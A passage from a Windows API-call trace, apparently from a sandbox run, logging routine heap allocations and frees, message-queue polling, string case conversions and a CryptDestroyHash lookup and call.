[0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.609] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.609] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.609] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.609] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.609] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0254.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0254.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.611] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0254.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.611] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.617] 